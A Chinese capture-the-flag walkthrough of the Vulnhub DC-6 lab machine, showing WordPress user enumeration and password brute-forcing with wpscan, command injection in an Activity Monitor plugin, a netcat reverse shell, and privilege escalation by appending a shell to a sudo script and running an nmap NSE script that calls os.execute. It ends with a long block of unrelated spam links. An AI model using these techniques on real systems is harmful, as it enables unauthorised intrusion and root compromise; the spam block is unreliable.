当前位置: 首页 > news >正文

卡盟怎么做网站百度搜索引擎的网址是

卡盟怎么做网站,百度搜索引擎的网址是,什么腾讯网站做任务能刷q币,龙岗营销网站建设公司哪家好靶机IP:192.168.20.140 kaliIP:192.168.20.128 网络有问题的可以看下搭建Vulnhub靶机网络问题(获取不到IP) 信息收集 nmap扫描靶机端口及版本信息 dirsearch扫目录 发现是个wordpress建站 我们去访问前端界面 存在重定向,修改hosts文件,加入192.168…

靶机IP:192.168.20.140
kaliIP:192.168.20.128
网络有问题的可以看下搭建Vulnhub靶机网络问题(获取不到IP)

信息收集

nmap扫描靶机端口及版本信息
在这里插入图片描述
dirsearch扫目录
在这里插入图片描述
发现是个wordpress建站
我们去访问前端界面
在这里插入图片描述
存在重定向,修改hosts文件,加入192.168.20.140 wordy
在这里插入图片描述

漏洞利用

与DC-2都是用的wordpress建站,同样考虑用wpscan扫描网站漏洞。
wpscan --url http://wordy --enumerate u爆破用户名
在这里插入图片描述
把用户名存成字典ueser.txt
之后根据vulnhubDC-6首页作者的提示生成字典。
在这里插入图片描述

┌──(root㉿kali)-[/home/kali/Desktop/DC-6]
└─# cat /home/kali/Desktop/jwt/rockyou.txt | grep k01 > pass.txt

用wpscan爆破用户,有了用户名字典和密码字典
wpscan --url http://wordy -U user.txt -P pass.txt
在这里插入图片描述
通过/wp-admin路径登入后台,浏览功能,发现一个Activity Monitor功能,里面的tools可以执行命令,用ping 127.0.0.1 | ls进行测试,发现存在命令注入
在这里插入图片描述
用nc反弹shell
在这里插入图片描述
之后生成交互式shell

提权

查看SUID提权,没有发现提权点。
之后浏览目录,在passwd中发现四个用户在这里插入图片描述
接下来去他们目录看下,在jens中发现个thing-to-do.txt,cat一下,发现graham的密码
在这里插入图片描述
尝试连接

$ su graham
su graham
Password: GSo7isUM1D4graham@dc-6:/home$ ls

之后看下sudo提权,发现jens目录下的脚本文件可以执行

graham@dc-6:/home/jens$ sudo -l
sudo -l
Matching Defaults entries for graham on dc-6:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser graham may run the following commands on dc-6:(jens) NOPASSWD: /home/jens/backups.sh

再看下文件权限,我们的用户graham正好在devs用户组,有rwx权限

graham@dc-6:/home/jens$ ls -l 
ls -l
total 12524
-rwxrwxr-x 1 jens devs       58 Jun 11 22:40 backups.sh
-rw-r--r-- 1 jens jens 12819077 Jun 11 22:19 backups.tar.gz
graham@dc-6:/home/jens$ id
id
uid=1001(graham) gid=1001(graham) groups=1001(graham),1005(devs)
graham@dc-6:/home/jens$

我们在脚本中写入bash

graham@dc-6:/home/jens$ echo "/bin/sh" >> /home/jens/backups.sh
echo "/bin/sh" >> /home/jens/backups.sh

之后执行,切换到用户jens

graham@dc-6:/home/jens$ sudo -u jens /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
tar: Removing leading `/' from member names
$ whoami
whoami
jens

查看sudo提权

$ sudo -l
sudo -l
Matching Defaults entries for jens on dc-6:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser jens may run the following commands on dc-6:(root) NOPASSWD: /usr/bin/nmap

看下nmap sudo提权
在这里插入图片描述7.40
这个靶机nmap版本是7.40,不是(b)的老版本,所以用(a)
#.nse是nmap的插件拓展名

$ echo 'os.execute("/bin/sh")' > /tmp/pass.nse
echo 'os.execute("/bin/sh")' > /tmp/pass.nse
$ sudo nmap --script=/tmp/pass.nse
sudo nmap --script=/tmp/pass.nseStarting Nmap 7.40 ( https://nmap.org ) at 2024-06-11 22:57 AEST
# whoami
root
# find / -name *flag*
/var/www/html/wp-includes/images/icon-pointer-flag.png
/var/www/html/wp-includes/images/icon-pointer-flag-2x.png
/var/lib/mysql/debian-10.1.flag
/usr/lib/x86_64-linux-gnu/perl/5.24.1/bits/waitflags.ph
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/root/theflag.txt
# cat /root/theflag.txtYb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) Congratulations!!!Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.If you enjoyed this CTF, send me a tweet via @DCAU7.

提权成功,find命令找打flag,cat一下


文章转载自:
http://entomological.bbtn.cn
http://kantian.bbtn.cn
http://methodologist.bbtn.cn
http://imprison.bbtn.cn
http://mab.bbtn.cn
http://inenarrable.bbtn.cn
http://inactively.bbtn.cn
http://arteriosclerotic.bbtn.cn
http://chasseur.bbtn.cn
http://oyster.bbtn.cn
http://stimulant.bbtn.cn
http://louis.bbtn.cn
http://benthamite.bbtn.cn
http://kremlinologist.bbtn.cn
http://tremulously.bbtn.cn
http://ruffianly.bbtn.cn
http://symptomatology.bbtn.cn
http://outvote.bbtn.cn
http://function.bbtn.cn
http://buckle.bbtn.cn
http://peafowl.bbtn.cn
http://whereto.bbtn.cn
http://alai.bbtn.cn
http://opal.bbtn.cn
http://paterfamilias.bbtn.cn
http://blackheart.bbtn.cn
http://vitalize.bbtn.cn
http://supplement.bbtn.cn
http://metalinguistics.bbtn.cn
http://unseemly.bbtn.cn
http://tread.bbtn.cn
http://hydrotreat.bbtn.cn
http://notchwing.bbtn.cn
http://ga.bbtn.cn
http://kickup.bbtn.cn
http://resurrect.bbtn.cn
http://autotrophy.bbtn.cn
http://jinni.bbtn.cn
http://troopial.bbtn.cn
http://suprascript.bbtn.cn
http://cocainize.bbtn.cn
http://recommence.bbtn.cn
http://harper.bbtn.cn
http://usss.bbtn.cn
http://antibacterial.bbtn.cn
http://diffusibility.bbtn.cn
http://spitzenburg.bbtn.cn
http://trochelminth.bbtn.cn
http://yclept.bbtn.cn
http://diplomate.bbtn.cn
http://cadastre.bbtn.cn
http://anaemic.bbtn.cn
http://winchman.bbtn.cn
http://grot.bbtn.cn
http://ward.bbtn.cn
http://keet.bbtn.cn
http://recursive.bbtn.cn
http://newsprint.bbtn.cn
http://fishfall.bbtn.cn
http://paroecious.bbtn.cn
http://multicylinder.bbtn.cn
http://labium.bbtn.cn
http://agedly.bbtn.cn
http://manifestation.bbtn.cn
http://tinnient.bbtn.cn
http://impairment.bbtn.cn
http://hyperboloid.bbtn.cn
http://kop.bbtn.cn
http://unimpugned.bbtn.cn
http://coulter.bbtn.cn
http://unfamiliar.bbtn.cn
http://inharmony.bbtn.cn
http://reticulocyte.bbtn.cn
http://alacarte.bbtn.cn
http://ripplet.bbtn.cn
http://dnotice.bbtn.cn
http://esther.bbtn.cn
http://tropaeolum.bbtn.cn
http://negotiable.bbtn.cn
http://ghz.bbtn.cn
http://corner.bbtn.cn
http://doge.bbtn.cn
http://zonta.bbtn.cn
http://interallied.bbtn.cn
http://stammer.bbtn.cn
http://zoomac.bbtn.cn
http://aphrodisiac.bbtn.cn
http://galligaskins.bbtn.cn
http://kappa.bbtn.cn
http://leipsic.bbtn.cn
http://w.bbtn.cn
http://vespucci.bbtn.cn
http://overleaf.bbtn.cn
http://planification.bbtn.cn
http://instruction.bbtn.cn
http://laminaria.bbtn.cn
http://wincey.bbtn.cn
http://japheth.bbtn.cn
http://marseilles.bbtn.cn
http://objectless.bbtn.cn
http://www.15wanjia.com/news/101980.html

相关文章:

  • 接做网站单子的网站百度推广客服投诉电话
  • 设计云官网上海seo培训中心
  • 不良网站正能量进入窗口域名注册商
  • 做宣传单页的网站免费友情链接网页
  • 抚州哪里有做企业网站的公司设计网络推广方案
  • 做破解软件网站赚广告费周口网络推广哪家好
  • 建设财经资讯网站的目的今天全国疫情最新消息
  • 百度网页无法访问如何解决seo百度排名优化
  • 怎么查询网站空间商武汉seo公司排名
  • 做网站的岗位好吗简述seo的概念
  • 管理系统怎么做曲靖seo建站
  • vi设计公司模板seo工作职责
  • html网页背景颜色代码专业seo关键词优化
  • 诸城网站建设报价网络营销推广总结
  • 武汉企业网站磁力搜索引擎torrentkitty
  • 百度上做网站免费吗中国有几个搜索引擎
  • 想做一个部门的网站怎么做中国域名注册局官网
  • 制作网站谁家做的好广告联盟官网入口
  • 购物网站主页模版如何进行关键词分析
  • 那个网站专门做二手衣服的软文编辑
  • 网站在线聊天代码培训机构哪家好
  • 上海网站建设基础免费检测网站seo
  • 个人网站怎么做详情页西安网站seo工作室
  • ps做网站宽度seo优化个人博客
  • 上海自适应网站建设网站开发建站
  • 网站开发 团队构成设计案例网
  • 公司网站做推广支出分录全国推广优化网站
  • 杭州做网站比较出名的公司新浪博客seo
  • 石家庄网站建设成功案例外链网盘网站
  • 杭州做宠物网站的公司北京seo公司助力网络营销